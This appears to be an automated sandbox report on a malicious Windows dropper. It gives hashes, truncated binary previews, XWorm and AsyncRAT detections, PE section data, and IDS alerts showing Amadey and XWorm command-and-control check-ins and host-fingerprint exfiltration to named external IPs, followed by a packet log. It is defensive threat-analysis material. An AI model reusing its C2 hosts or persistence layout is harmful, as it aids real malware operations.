                                                      Joe Sandbox View:
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r0Kg.....................@.......`...`... ....@.. .......................`............@.................................T...W.... .......................@.......................................................`..................H...........U@...7'.@6... ...8..................@...XejnR........`.......<.............. ..`.text...............>.............. ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1723904
                                                      Entropy (8bit):7.9350018891587055
                                                      Encrypted:false
                                                      SSDEEP:49152:KQ4SuBDQC/lhGT3uXQqxxi0se9ZqMUO7kF:2S8QilVXBwgq
                                                      MD5:7AC5198E128DEDA55EEEB6CCFC8B57EA
                                                      SHA1:96B58D89DDFEDDA3DC8DAEBB4391ABE40843253E
                                                      SHA-256:887A2E09A1E373AD3F5224A8464B0E5B4EBE4A344958C2D9C91CBD42A54F1241
                                                      SHA-512:806E4CBF2B47AFF1E0BFB89FA13D55D10290C4CABB97E675808F3DBDCB7633D8FD97FC10619EFD1C0EE8D11A0C15C0604CCFC32D9A60979542A5235087127818
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 32%
                                                      Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r0Kg.................~........... D.. ........@.. .......................`D..........@.................................U...i.......8........................................................................................................... . ..... ...@... ..............@....rsrc...8............`..............@....idata . ...........d..............@... .`)..........f..............@...dvpnmyli.....@*......h..............@...lhlewnhz. ....D......(..............@....taggant.@... D.."...,..............@...........................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1884160
                                                      Entropy (8bit):7.950739594502025
                                                      Encrypted:false
                                                      SSDEEP:49152:WXD4eGRjQJL6mT3b65gwKJQz0vu5Qx/XJ/Jl9KdhYFoQZ27:asjy6WS8JQzOz/XJTQdh1QZ27
                                                      MD5:795DC87C1AF119B6D27E01167FC129D2
                                                      SHA1:42C70518B0CE7AEA4BAFC32F8B3EF114FEBFED40
                                                      SHA-256:F9D0E9D1C7D55D226E049475BE712FC1F9CD619B5E04CF615C0AD1274277341B
                                                      SHA-512:6DE05C69379B4DA8BB8E9C4543EB42DEE1ACD57EF1CD60E03C25AE0942562EDC5BC998B956AC72EC053E7F94E8272FAA34553681C16BEF57DBD82AF6CC33150D
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 53%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................J...........@...........................K......i....@.................................W...k.............................J.............................8.J..................................................... . ............................@....rsrc...............................@....idata ............................@... .p*.........................@...yguzlnpo..... 1.....................@...fkybguvz......J.....................@....taggant.0....J.."..................@...................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Nov 30 16:08:15 2024, mtime=Sat Nov 30 16:08:15 2024, atime=Sat Nov 30 16:08:15 2024, length=52736, window=hide
                                                      Category:dropped
                                                      Size (bytes):759
                                                      Entropy (8bit):5.058129684331557
                                                      Encrypted:false
                                                      SSDEEP:12:80zZKg4YbWCRdY//BysJLMf0Kae78pEAtjA+rH8oKeEAwpHBmV:8nHG+ISWOLJA+VLwpHBm
                                                      MD5:079924290943FD70B60347366AB67381
                                                      SHA1:B56763720CCF4D52C9BE28F49C473E759C7B0321
                                                      SHA-256:BB19ADDF6E1C2F954BF84B32245B764AE9F79DC0F95A34B1FA8BABF2F3D291C4
                                                      SHA-512:8BA03B8DB162DADC61114D156D5C94224421877BC7B337818C805985454A801DD064CD3DD31733432AFFF11D062CB41E2DF84095DCFAB0B392B8893622344B70
                                                      Malicious:false
                                                      Preview:L..................F.... .../@.qJC../@.qJC../@.qJC..........................t.:..DG..Yr?.D..U..k0.&...&......vk.v......=JC...Q.qJC......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^~Y............................%..A.p.p.D.a.t.a...B.V.1.....~Y...Roaming.@......CW.^~Y...............................R.o.a.m.i.n.g.....`.2.....~Y.. .github.exe..F......~Y..~Y..............................o.g.i.t.h.u.b...e.x.e.......X...............-.......W...........b/:G.....C:\Users\user\AppData\Roaming\github.exe........\.....\.....\.....\.....\.g.i.t.h.u.b...e.x.e.`.......X.......571345...........hT..CrF.f4... .n..=....,.......hT..CrF.f4... .n..=....,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                      Process:C:\Users\user\AppData\Local\Temp\1010698001\cAvEmnl.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):52736
                                                      Entropy (8bit):6.560412971442069
                                                      Encrypted:false
                                                      SSDEEP:1536:J/mQgB/wjBHgXOo6PF09a3Yu2u29Pp9/D9gSFovbnlgZFO/86c9p:J/mzBIlAe3WuMzr9vFovbnmFO/54
                                                      MD5:EFD5937F50C21B5CE660D67F3F995821
                                                      SHA1:28C4A690949E1A798904C67A869E33EC0F70BA13
                                                      SHA-256:5A09D23637929D77E9C04322D800690BC6E7272E0755843F387C37B99F452FB8
                                                      SHA-512:13E092E75FD3FCF2DAFCE1E186F6583DF1F562FFEBC5F45CDF80A21F2DEA25DC96E1535194E393B94153E2D41CB8B0E86B7835CB918FB278E119486836BC1CD9
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\github.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\github.exe, Author: ditekSHen
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 55%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r0Kg.....................@.......`...`... ....@.. .......................`............@.................................T...W.... .......................@.......................................................`..................H...........U@...7'.@6... ...8..................@...XejnR........`.......<.............. ..`.text...............>.............. ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):284
                                                      Entropy (8bit):3.384516219323605
                                                      Encrypted:false
                                                      SSDEEP:6:P2R3gXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lB7llPEt0:EKf2RKQ1CGAFAjzvYRQVB7nEt0
                                                      MD5:D307AE650BD297F03CA394E9427C5126
                                                      SHA1:3F177AADD4837B69E2EE6CD3ABA506172F73FF57
                                                      SHA-256:313472BFC4EDF7855C57F0E124605ABD5C5C7D328C311FA23C629106749C3E9F
                                                      SHA-512:73C329DED025D1B131C5AB84466B17C8357E206426B19E4F30D022C8420BDC6F3A6676EC7F8EFE00BFAC97F99C2F01A5EC05F7392E747306BDDB35CF61FC7AE4
                                                      Malicious:false
                                                      Preview:......b.LCA...n@.1F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.950739594502025
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:file.exe
                                                      File size:1'884'160 bytes
                                                      MD5:795dc87c1af119b6d27e01167fc129d2
                                                      SHA1:42c70518b0ce7aea4bafc32f8b3ef114febfed40
                                                      SHA256:f9d0e9d1c7d55d226e049475be712fc1f9cd619b5e04cf615c0ad1274277341b
                                                      SHA512:6de05c69379b4da8bb8e9c4543eb42dee1acd57ef1cd60e03c25ae0942562edc5bc998b956ac72ec053e7f94e8272faa34553681c16bef57dbd82af6cc33150d
                                                      SSDEEP:49152:WXD4eGRjQJL6mT3b65gwKJQz0vu5Qx/XJ/Jl9KdhYFoQZ27:asjy6WS8JQzOz/XJTQdh1QZ27
                                                      TLSH:9D9533F8CF6786FFE2FCC1B4630D4F1B39B0420209889E6251AC2579C95F565ABB2D18
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                      Icon Hash:90cececece8e8eb0
                                                      Entrypoint:0x8ae000
                                                      Entrypoint Section:.taggant
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:6
                                                      OS Version Minor:0
                                                      File Version Major:6
                                                      File Version Minor:0
                                                      Subsystem Version Major:6
                                                      Subsystem Version Minor:0
                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                      Instruction
                                                      jmp 00007F3DE87EA27Ah
                                                      setle byte ptr [eax+eax]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      jmp 00007F3DE87EC275h
                                                      add byte ptr [edi], al
                                                      or al, byte ptr [eax]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], dh
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [edx], ah
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], cl
                                                      or al, byte ptr [eax]
                                                      add byte ptr [edx], cl
                                                      or al, byte ptr [eax]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], al
                                                      add byte ptr [eax], 00000000h
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      adc byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add cl, byte ptr [edx]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x388.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x4ac0880x10yguzlnpo
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x4ac0380x18yguzlnpo
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      0x10000x680000x2de007b91343a0a4f86e526db20cf2b342b10False0.9982810371253406data7.9841219629652915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x690000x3880x400653a286c975ebb00a599f52fe26a194eFalse0.5data4.318140399940749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      0x6b0000x2a70000x200aa29ae031788cb96f5fd633968098753unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      yguzlnpo0x3120000x19b0000x19a400a56875b04fef9f129239d6a9813ded56False0.9946524127818404data7.954610998694376IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      fkybguvz0x4ad0000x10000x4005310ca1f97851d91bcbef2cda291274eFalse0.7646484375data6.017808982110757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .taggant0x4ae0000x30000x22001b28343d8a4477bc6009b1a91d88fd65False0.06583180147058823DOS executable (COM)0.7536269129516635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_MANIFEST0x4ac0980x198ASCII text, with CRLF line terminators0.5833333333333334
                                                      RT_MANIFEST0x4ac2300x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                      DLLImport
                                                      kernel32.dlllstrcpy
                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States
                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-11-30T18:08:08.586709+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449753185.215.113.4380TCP
                                                      2024-11-30T18:08:14.041214+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44977531.41.244.1180TCP
                                                      2024-11-30T18:08:16.743019+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.449769TCP
                                                      2024-11-30T18:08:20.742546+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449784185.215.113.4380TCP
                                                      2024-11-30T18:08:24.164103+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1179.43.171.2097000192.168.2.449785TCP
                                                      2024-11-30T18:08:24.164103+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21179.43.171.2097000192.168.2.449785TCP
                                                      2024-11-30T18:08:27.266910+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44980531.41.244.1180TCP
                                                      2024-11-30T18:08:31.606790+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449785179.43.171.2097000TCP
                                                      2024-11-30T18:08:32.028312+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1179.43.171.2097000192.168.2.449785TCP
                                                      2024-11-30T18:08:32.033547+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449785179.43.171.2097000TCP
                                                      2024-11-30T18:08:34.188264+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449820185.215.113.4380TCP
                                                      2024-11-30T18:08:38.320632+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449823185.215.113.1680TCP
                                                      2024-11-30T18:08:40.968449+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449837185.215.113.1680TCP
                                                      2024-11-30T18:08:46.447980+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1179.43.171.2097000192.168.2.449785TCP
                                                      2024-11-30T18:08:46.449937+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449785179.43.171.2097000TCP
                                                      2024-11-30T18:08:54.174046+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1179.43.171.2097000192.168.2.449785TCP
                                                      2024-11-30T18:08:54.174046+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21179.43.171.2097000192.168.2.449785TCP
                                                      2024-11-30T18:08:54.929960+01002044623ET MALWARE Amadey Bot Activity (POST)1192.168.2.449860185.215.113.4380TCP
                                                      2024-11-30T18:09:00.618246+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1179.43.171.2097000192.168.2.449785TCP
                                                      2024-11-30T18:09:00.664462+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449785179.43.171.2097000TCP
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 30, 2024 18:08:04.467483044 CET4975380192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:08:04.587501049 CET8049753185.215.113.43192.168.2.4
                                                      Nov 30, 2024 18:08:04.587578058 CET4975380192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:08:04.587791920 CET4975380192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:08:04.708259106 CET8049753185.215.113.43192.168.2.4
                                                      Nov 30, 2024 18:08:08.586709023 CET4975380192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:08:10.102602959 CET4976980192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:08:10.222628117 CET8049769185.215.113.43192.168.2.4
                                                      Nov 30, 2024 18:08:10.222897053 CET4976980192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:08:10.222976923 CET4976980192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:08:10.343405008 CET8049769185.215.113.43192.168.2.4
                                                      Nov 30, 2024 18:08:12.515664101 CET8049769185.215.113.43192.168.2.4
                                                      Nov 30, 2024 18:08:12.515753031 CET4976980192.168.2.4185.215.113.43
                                                      Nov 30, 2024 18:08:12.520142078 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:12.643119097 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:12.643187046 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:12.643426895 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:12.763621092 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.041142941 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.041213989 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.041383028 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.041393995 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.041428089 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.041451931 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.041790009 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.041807890 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.041830063 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.041860104 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.042654037 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.042665958 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.042674065 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.042696953 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.042745113 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.043595076 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.043606997 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.043644905 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.043657064 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.161168098 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.161241055 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.161631107 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.161802053 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.165393114 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.165446997 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.165575981 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.165622950 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.242492914 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.242563009 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.242818117 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.242893934 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.246692896 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.246757030 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.246891975 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.246941090 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.255119085 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.255193949 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.255341053 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.255489111 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.263556957 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.263618946 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.263751030 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.263802052 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.271971941 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.272034883 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.272167921 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.272218943 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.280384064 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.280428886 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.280603886 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.280734062 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.288786888 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.288845062 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.289024115 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.289066076 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.297211885 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.297283888 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.297418118 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.297465086 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.305628061 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.305685043 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.305833101 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.305871964 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.312910080 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.312978029 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.313091040 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.313137054 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.320385933 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.320436001 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.320564032 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.320611000 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.327449083 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.327502012 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.327625036 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.327672005 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.443679094 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.443761110 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.443854094 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.444051981 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.446391106 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.446443081 CET4977580192.168.2.431.41.244.11
                                                      Nov 30, 2024 18:08:14.446584940 CET804977531.41.244.11192.168.2.4
                                                      Nov 30, 2024 18:08:14.446630001 CET4977580192.168.2.431.41.244.11
